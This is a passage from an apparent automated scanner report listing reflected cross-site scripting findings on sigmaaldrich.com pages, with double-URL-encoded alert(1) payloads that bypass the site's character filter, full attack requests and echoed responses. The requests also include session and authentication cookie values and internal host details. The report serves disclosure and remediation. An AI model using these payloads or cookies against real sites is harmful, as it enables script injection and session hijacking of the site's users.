Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-centerb0367%2522%253balert%25281%2529%252f%252fb9e8ecba5c3/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-centerb0367";alert(1)//b9e8ecba5c3/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.52. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ecd0%2522%253balert%25281%2529%252f%252f8e4e3844c4c was submitted in the REST URL parameter 4. This input was echoed as 8ecd0";alert(1)//8e4e3844c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-center/aldrichimica-acta8ecd0%2522%253balert%25281%2529%252f%252f8e4e3844c4c/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-center/aldrichimica-acta8ecd0";alert(1)//8e4e3844c4c/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.53. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4308%2522%253balert%25281%2529%252f%252f886483ea1d9 was submitted in the REST URL parameter 5. This input was echoed as d4308";alert(1)//886483ea1d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/d4308%2522%253balert%25281%2529%252f%252f886483ea1d9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:36 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/d4308";alert(1)//886483ea1d9","E404") ;
   </script>
...[SNIP]...

1.54. http://www.sigmaaldrich.com/chemistry/chemistry-products1.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-products1.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe1bd%2522%253balert%25281%2529%252f%252f4c13458dba4 was submitted in the REST URL parameter 1. This input was echoed as fe1bd";alert(1)//4c13458dba4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryfe1bd%2522%253balert%25281%2529%252f%252f4c13458dba4/chemistry-products1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28938
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistryfe1bd";alert(1)//4c13458dba4/chemistry-products1.html","E404") ;
   </script>
...[SNIP]...

1.55. http://www.sigmaaldrich.com/chemistry/chemistry-products1.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-products1.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6952%2522%253balert%25281%2529%252f%252f490a10955c0 was submitted in the REST URL parameter 2. This input was echoed as d6952";alert(1)//490a10955c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/d6952%2522%253balert%25281%2529%252f%252f490a10955c0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:22 GMT
Content-Length: 28914
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/d6952";alert(1)//490a10955c0","E404") ;
   </script>
...[SNIP]...

1.56. http://www.sigmaaldrich.com/chemistry/chemistry-services.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemistry-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6544%2522%253balert%25281%2529%252f%252f072c5b7bf71 was submitted in the REST URL parameter 1. This input was echoed as b6544";alert(1)//072c5b7bf71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistryb6544%2522%253balert%25281%2529%252f%252f072c5b7bf71/chemistry-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
